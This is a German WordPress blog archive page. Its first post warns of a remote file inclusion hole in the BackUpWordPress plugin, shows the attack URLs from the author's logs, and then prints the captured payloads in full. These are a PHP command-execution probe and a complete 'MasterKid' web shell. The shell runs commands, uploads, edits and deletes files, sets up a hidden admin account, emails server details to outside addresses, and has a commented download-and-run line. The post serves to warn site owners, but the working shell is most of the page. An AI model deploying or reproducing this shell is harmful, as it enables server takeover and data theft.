Archive for the ‘Wordpress’ Category

Wordpress: Predicate.php?bkpwp_plugin_path

Friday, November 23rd, 2007

Hier ein kleiner Hinweis an alle Leute mit dem BackUpWordPress Plugin (bkpwp): Über das Plugin ist es Möglich ein Code ins System ein zu schleusen.

Bei mir wurde es auch versucht (habe aber das Plugin nicht installiert). Der Aufruf sah bei mir dann so aus:

  • http://www.cs-internet.de/internet/scripte/wordpress-update-222/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://www.freewebtown.com/w8ting/safe.txt??
  • http://www.cs-internet.de/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://www.freewebtown.com/w8ting/safe.txt??

Hab mal ein wenig weiter die Logs durchsucht und ein paar Urls funktionierten sogar noch so das ich mir das Script mal kopiert habe. (AntiVir erkennt den Code übrigends als Expliot)

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

und noch einer

<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="wWw">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>By MasterKid > wWw > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
<center>eu.undernet.org - #wWw.cOm</center>
<?php
 ini_set("display_errors",0);
 @set_time_limit(0);

 $string = $_SERVER['QUERY_STRING'];
 $mhost = 'http://www.myspace.si/images/cmd.gif?';
 $host_all = explode("$mhost", $string);
 $s1 = $host_all[0];
 $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

 $OS = @PHP_OS;
 $IpServer = '127.0.0.1';
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
 else { $SafeMode = "<i>$SafeMode</i>"; }

/* end of scan */
 /*
 $btname = 'backtool.txt';
 $bt = 'http://see-my-ip.info/scan.txt';
 $dc = 'http://www.full-comandos.com/jobing/dc.txt';
 $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';
 */
// Java Script
 echo "<script type=\"text/javascript\">";

 echo "function ChMod(chdir, file) {";
 echo "var o = prompt('Chmod: - Exemple: 0777', '');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Rename(chdir, file, mode) {";
 echo "if (mode == 'edit') {";
 echo "var o = prompt('Rename file '+ file + ' for:', '');";
 echo "}";
 echo "else {";
 echo "var o = prompt('Rename dir '+ file + ' for:', '');";
 echo "}";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";
 echo "}";
 echo "}";
 echo "function Copy(chdir, file) {";
 echo "var o = prompt('Copied for:', '/tmp/' + file);";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Mkdir(chdir) {";
 echo "var o = prompt('Which name?', 'NewDir');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Newfile(chdir) {";
 echo "var o = prompt('Which name?', 'NewFile.txt');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";
 echo "}";
 echo "}";
 echo "</script>";

 // End JavaScript

	/* Functions */
	function cmd($CMDs) {
		$CMD[1] = '';
		exec($CMDs, $CMD[1]);
		if (empty($CMD[1])) {
			$CMD[1] = shell_exec($CMDs);
		}
			elseif (empty($CMD[1])) {
			$CMD[1] = passthru($CMDs);
		}
		elseif (empty($CMD[1])) {
			$CMD[1] = system($CMDs);
		}
		elseif (empty($CMD[1])) {
			$handle = popen($CMDs, 'r');
			while(!feof($handle)) {
				$CMD[1][] .= fgets($handle);
			}
			pclose($handle);
		}
		return $CMD[1];
	}

if (@$_GET['chdir']) {
 $chdir = $_GET['chdir'];
} else {
   $chdir = getcwd()."/";
  }
if (@chdir("$chdir")) {
 $msg = "<font color=\"#008000\">Entrance in the directory, OK!</font>";
} else {
 $msg = "<font color=\"#FF0000\">Error to enters it in the directory!</font>";
 $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
 $chdir = str_replace(chr(92), chr(47), $chdir);

if (@$_GET['action'] == 'upload') {
 $uploaddir = $chdir;
 $uploadfile = $uploaddir. $_FILES['userfile']['name'];
 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
  $msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>, the archive is validates and was loaded successfully.</font>";
 } else {
    $msg = "<font color=\"#FF0000\">Error when copying archive.</font>";
   }
}
elseif (@$_GET['action'] == 'mkdir') {
    $newdir = $_GET['newdir'];
    if (@mkdir("$chdir"."$newdir")) {
     $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, directory created successfully.</font>";
    } else {
       $msg = "<font color=\"#FF0000\">Error to it creates directory.</font>";
      }
}
elseif (@$_GET['action'] == 'newfile') {
    $newfile = $_GET['newfile'];
    if (@touch("$chdir"."$newfile")) {
     $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, created successfully!</font>";
    } else {
       $msg = "<font color=\"#FF0000\">Error to tries it creates archive.</font>";
      }
}

elseif (@$_GET['action'] == 'del') {
     $file = $_GET['file']; $type = $_GET['type'];
     if ($type == 'file') {
      if (@unlink("$chdir"."$file")) {
       $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded archive!</font>";
      } else {
         $msg = "<font color=\"#FF0000\">Error to it I excluded archive!</font>";
        }
     } elseif ($type == 'dir') {
        if (@rmdir("$chdir"."$file")) {
          $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded directory!</font>";
        } else {
           $msg = "<font color=\"#FF0000\">Error to it I excluded directory!</font>";
          }
       }
}
elseif (@$_GET['action'] == 'chmod') {
     $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
     if (@chmod ("$file", $chmod)) {

      $msg = "<font color=\"#008000\">Chmod of</font> <font color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">moved for</font> <font color=\"#000080\">$chmod</font> <font color=\"#008000\">successfully.</font>";
     } else {
        $msg = '<font color=\"#FF0000\">Error when moving chmod.</font>';
       }
}
elseif (@$_GET['action'] == 'rename') {
     $file = $_GET['file']; $newname = $_GET['newname'];
     if (@rename("$chdir"."$file", "$chdir"."$newname")) {
      $msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font> <font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font color=\"#008000\">successfully!</font>";
     } else {
        $msg = "<font color=\"#FF0000\">Error to it nominates archive.</font>";
       }
}
elseif (@$_GET['action'] == 'copy') {
    $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
    if (@copy("$file", "$copy")) {
     $msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
    } else {
       $msg = "<font color=\"#FF0000\">Error when copying</font> <font color=\"#000000\">{$file}</font> <font color=\"#FF0000\">for</font> <font color=\"#000000\">{$copy}</font></font>";
      }
}
/* Parte Atualiza 02:48 12/2/2006 */

elseif (@$_GET['action'] == 'cmd') {
	if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
	if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
	$cmd = stripslashes(trim($cmd));
	$result_arr = cmd($cmd);

	$afim = count($result_arr); $acom = 0; $msg = '';
	$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results: <b>".$cmd."</b></p>";
	if ($result_arr) {
		while ($acom <= $afim) {
			$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
		$acom++;
 		}
	}
	else {
		$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
	}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
 echo "Loading... module</br>";

    if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
        @dl('php_shmop.dll');
    } else {
        @dl('shmop.so');
    }
}

if (@extension_loaded('shmop')) {
 echo "Module: <b>shmop</b> loaded!</br>";

 $shm_id = @shmop_open(0xff2, "c", 0644, 100);
 if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
 $data="\x00";
 $offset=-3842685;
 $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
 if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
 if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
 echo passthru("id");
 shmop_close($shm_id);

} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}

elseif (@$_GET['action'] == 'zipen') {
 $file = $_GET['file'];
 $zip = @zip_open("$chdir"."$file");
 $msg = '';
if ($zip) {

    while ($zip_entry = zip_read($zip)) {
        $msg .= "Name:               " . zip_entry_name($zip_entry) . "\n";
        $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) . "\n";
        $msg .= "Compressed Size:    " . zip_entry_compressedsize($zip_entry) . "\n";
        $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";

        if (zip_entry_open($zip, $zip_entry, "r")) {
            echo "File Contents:\n";
            $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
            echo "$buf\n";

            zip_entry_close($zip_entry);
        }
        echo "\n";

    }

    zip_close($zip);

}
}
elseif (@$_GET['action'] == 'edit') {
 $file = $_GET['file'];
 $conteudo = '';
 $filename = "$chdir"."$file";
 $conteudo = @file_get_contents($filename);
 $conteudo = htmlspecialchars($conteudo);
 $back = $_SERVER['HTTP_REFERER'];
 echo "<p align=\"center\">Editing {$file} ...</p>";
 echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
 echo "<tr>";
 echo "<td width=\"100%\">";
 echo "<form method=\"POST\" action=\"{$fstring}&action=save&chdir={$chdir}&file={$file}\">";
 echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
 print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
 echo "<p align=\"center\">";
 echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
 echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
 echo "</form>";
 echo "</td>";
 echo "</tr>";
 echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
   $filename = "$chdir".$_GET['file'];
   $somecontent = $_POST['S1'];
   $somecontent = stripslashes(trim($somecontent));
   if (is_writable($filename)) {
    @$handle = fopen ($filename, "w");
    @$fw = fwrite($handle, $somecontent);
    @fclose($handle);
    if ($handle && $fw) {
     $msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font color=\"#008000\">edited successfully!</font>";
    }
 } else {
    $msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">cannot be written!</font>";
   }
}

// Informações
 $cmdget = '';
 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
 $cmdget = htmlspecialchars($cmdget);
 function asdads() {
  $asdads = '';
  if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
  if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
  if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
  if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
  if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
  return $asdads;
 }

echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&action=cmd&chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informações</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Sistema:</b> </td></p>";
echo "<td width=\"92%\"> {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Uname: </b></td></p>";
echo "<td width=\"92%\"> {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>PHP: </b></td></p>";
echo "<td width=\"92%\"> {$PHPv}, <b>safe mode:</b> {$SafeMode}</td>";
echo "</tr>";
 if (strtoupper(substr($OS, 0,3) != 'WIN')) {
  $Methods = asdads();
  if ($Methods == '') { $Methods = "???"; }
  echo "<tr>";
  echo "<td width=\"8%\">";
  echo "<p align=\"right\"><b>Methods: </b></td></p>";
  echo "<td width=\"92%\"> {$Methods}</td>";
  echo "</tr>";
 }

echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Ip: </b></td></p>";
echo "<td width=\"92%\"> {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Command: </b></td></p>";
echo "<td width=\"92%\"> <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"> <input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Dir

echo "<form method=\"POST\" action=\"{$fstring}&action=upload&chdir=$chdir\" enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
if (is_writable("$chdir")) {
 if (strtoupper(substr($OS, 0,3) == 'WIN')) {
  echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser\">[Remote Access]</a></legend>";
 } else {
    echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=yes\">[BackTool]</a></legend>";
   }
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
  echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}\">[Remote Access]</a></legend>";
 } else {
    echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=no\">[BackTool]</a></legend>";
   }
}

  $OS = @PHP_OS;
  $UNAME = @php_uname();
  $PHPv = @phpversion();
  $SafeMode = @ini_get('safe_mode');

  if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
  else { $SafeMode = "<i>$SafeMode</i><BR>"; }
  /*----------------[Setting]----------------*/
$injekan = "MasterKidShell";
ini_set("SMTP","localhost");
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{$hsafemode = "<font color=#8FE79A>ON (secure)</font>";}
else {$hsafemode = "<font color=#F8D2FB>OFF (not secure)</font>";}
$os = php_uname();
$dir = @getcwd();
if(''==($df=@ini_get('disable_functions'))){$disablefunc = "NONE";}else{$disablefunc= "$df";}

$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;

$webserver= @substr($SERVER_SOFTWARE,0,120);
$today = date("F j, Y, g:i a");

/*function disk space ------------*/
function view_size($size)
{
 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
/*----end of function--------*/
/*------------------------------------------------E.O.S---------------------*/

$psn="
<html>
<head><title>Php shell</title>
<style>
a:link  { text-decoration:none; color:#FFFFFF}
a:visited { text-decoration:none; color:#BCBCBC}
a:hover { text-decoration:underline; color:#8A8A8A}
</style>
</head>
<body>
<table align='center' bgcolor=#4FE0E8 border=1>";
$psn .= "<tr><td colspan=2 bgcolor=#62788A><div align=\"center\"><strong><font face='Courier new' color='#ffffff'>Victim Informations</font></strong></div></td></tr>";
$psn .= "<tr><td bgcolor=#A2D9EE>Target</td><td bgcolor=#349BC8>             <a href='http://".$HTTP_HOST.$_SERVER["REQUEST_URI"]."'><strong><font face='arial' color=#ffffff>http://".$HTTP_HOST.$_SERVER["REQUEST_URI"]."</font></strong></td></tr>";
$psn .= "<tr><td bgcolor=#349BC8><strong><font color=#ffffff>Sysinfo</font></strong></td><td bgcolor=#A2D9EE>             ".$os."</td></tr>";
$psn .= "<tr><td bgcolor=#A2D9EE>Safe Mode</td><td bgcolor=#349BC8>          <strong><font color=#ffffff>".$hsafemode."</font></td></tr>";
$psn .= "<tr><td bgcolor=#3DB0DC><strong><font color=#ffffff>Disable function </font></strong></td><td bgcolor=#A2D9EE>   ".$disablefunc."</td></tr>";
$psn .= "<tr><td bgcolor=#A2D9EE>Injection type</td><td bgcolor=#349BC8>        <strong><font face='Arial' color=#000000><div align=\"center\">".$injekan."</div></strong></font></td></tr>";
$psn .= "<tr><td bgcolor=#3DB0DC><strong><font color=#ffffff>Total disk</font></strong> </td><td bgcolor=#A2D9EE>         ".view_size($all)."</td></tr>";
$psn .= "<tr><td bgcolor=#A2D9EE>Free space disk </td><td bgcolor=#349BC8>    <strong><font color=#ffffff>".view_size($free)."</font></td></tr>";
$psn .= "<tr><td bgcolor=#3DB0DC><strong><font color=#ffffff>Used space disk</font></strong> </td><td bgcolor=#A2D9EE>    ".view_size($used)."</td></tr>";
$psn .= "<tr><td bgcolor=#A2D9EE>Web server </td><td bgcolor=#349BC8>         <strong><font color=#ffffff>".$webserver."</font></td></tr>";
$psn .="<tr><td bgcolor=#3DB0DC><strong><font color=#ffffff>Tanggal</font></td><td bgcolor=#A2D9EE>$today</td></tr>
</table>       <br>
</div><div align='center'>Coded By <br><strong> MasterKid</strong></div>
</body></html>";

$header = "From: shell@shell.com <getx0x@yahoo.com>\r\nReply-To: Horseshit\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$psn\r\n";

if (@!$handle = opendir("$chdir")) {
 echo " I could not enters in the directory, <a href=\"{$fstring}\">click here!</a> for return to the original directory!</br>";
}
else {
echo "  <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "    <tr>";
echo "      <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> Upload:";
echo "      <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
echo "      <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
echo "    </tr>";
echo "    <tr>";
echo "      <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> </td>";
echo "    </tr>";
echo "    <tr>";
echo "      <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
if (@!$msg) {
 echo "      <p align=\"left\">Messages</td>";
} else {
   echo "      <p align=\"left\">$msg</td>";
  }
echo "    </tr>";
echo "    <tr>";
echo "      <td width=\"100%\" colspan=\"4\"> </td>";
echo "    </tr>";
echo "    <tr>";
echo "      <td width=\"9%\"> Perms</td>";
echo "      <td width=\"49%\"> File </td>";
echo "      <td width=\"10%\"> Size </td>";
echo "      <td width=\"32%\"> Commands</td>";
echo "    </tr>";
mail("xml.shells@gmail.com,xmlsh3llz@yahoo.com,xmlshellz@yahoo.com",$os."--safemode : ".$hsafemode,"",$header);
$colorn = 0;
    while (false !== ($file = readdir($handle))) {
        if ($file != '.') {
            if ($colorn == 0) {
             $color = "style=\"background-color: #FFCC66\"";
            }
            elseif ($colorn == 1) {
             $color = "style=\"background-color: #C0C0C0\"";
            }
            if (@is_dir("$chdir"."$file")) {
             $file = $file.'/';
             $mode = 'chdir';
            } else {
               $mode = 'edit';
             }
            if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
              $chdir .= '/';
            }
            if ($file == '../') {
             $lenpath = strlen($chdir); $baras = 0;
             for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
             $chdir_ = explode("/", $chdir);
             $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
            }
            $perms = @fileperms ("$chdir"."$file");
            if ($perms == '') {
             $perms = '???';
            }
            $size = @filesize ("$chdir"."$file");
            $size = $size / 1024;
            $size = explode(".", $size);
            if (@$size[1] != '') {
             $size = $size[0].'.'.@substr("$size[1]", 0, 2);
            } else {
               $size = $size[0];
             }
            if ($size == 0) {
             if ($mode == 'chdir') {
              $size = '???';
             }
            }
            echo "<tr>";
	    echo "<td width=\"9%\" $color> $perms</td>";
            if (@is_writable ("$chdir"."$file")) {
             if ($mode == 'chdir') {
              if ($file == '../') {
               echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir=$chdirpox\">$file</a></b></td>";
              } else {
                 echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></b></td>";
                }
             } else {
		if (is_readable("$chdir"."$file")) {
                 echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></b></td>";
                } else {
                   echo "<td width=\"49%\" $color> <b>$file</b></td>";
                  }
               }
            }
           else {
             if ($mode == 'chdir') {
              if ($file == '../') {
               echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a></td>";
              } else {
                 echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";
               }
             } else {
		if (@is_readable("$chdir"."$file")) {
                 echo "<td width=\"49%\" $color> <a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></td>";
                } else {
                   echo "<td width=\"49%\" $color> $file</td>";
                 }
               }
             }
            echo "<td width=\"10%\" $color> $size KB</td>";
            if ($mode == 'edit') {
             echo "<td width=\"32%\" $color> <a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file\">[Del]</a> <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> <a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
            } else {
               echo "<td width=\"32%\" $color> <a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir\">[Del]</a> <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> [Copy]</td>";
              }
            echo "</tr>";
            if ($colorn == 0) {
             $colorn = 1;
            }
            elseif ($colorn == 1) {
             $colorn = 0;
            }
        }
    }
    closedir($handle);
}
@include "$bn";

//$scan= passthru('cd /tmp;wget http://xpl.bisa-ba.ca/bin2.txt;fetch http://xpl.bisa-ba.ca/bin2.txt;GET http://xpl.bisa-ba.ca/bin2.txt >> /tmp/bin2.txt;curl http://xpl.bisa-ba.ca/bin2.txt -o /tmp/bin2.txt;lynx -source http://xpl.bisa-ba.ca/bin2.txt > /tmp/bin2.txt;links -source http://xpl.bisa-ba.ca/bin2.txt > /tmp/bin2.txt;perl /tmp/bin2.txt;rm -rf /tmp/bin2.txt');

?>
  </table>
  </fieldset></form>
  <p align="center">
    <a href="http://validator.w3.org/check?uri=referer"><img
        src="http://www.w3.org/Icons/valid-html401"
        alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
  </p>
</body>

</html>

Posted in Wordpress | 1 Comment »

Wordpress Redirection Plugin

Tuesday, November 13th, 2007

Ich bin letztens auf ein für einige von euch sicher interessantes Plugin gestoßen. Das Redirection Plugin von John Godley kann ohne großen Aufwand Weiterleitungen in Wordpress anlegen. (more…)

Tags: ,
Posted in Plugins | No Comments »

WordPress Update 2.3.1

Saturday, October 27th, 2007

WordPress hat ein neues Update auf Version 2.3.1 herausgebracht. Das Update enthält Bugfixes und Securityfixes unteranderem wegen einem XSS Problem. (more…)

Tags:
Posted in Updates | 4 Comments »

WordPress Empfehlungen

Tuesday, October 16th, 2007

Der Hauptgrund warum ich mein WordPress Weblog noch nicht auf die aktuellste Version upgedatet habe war wohl die neue Tagging Funktion. (more…)

Tags: , ,
Posted in Plugins | 2 Comments »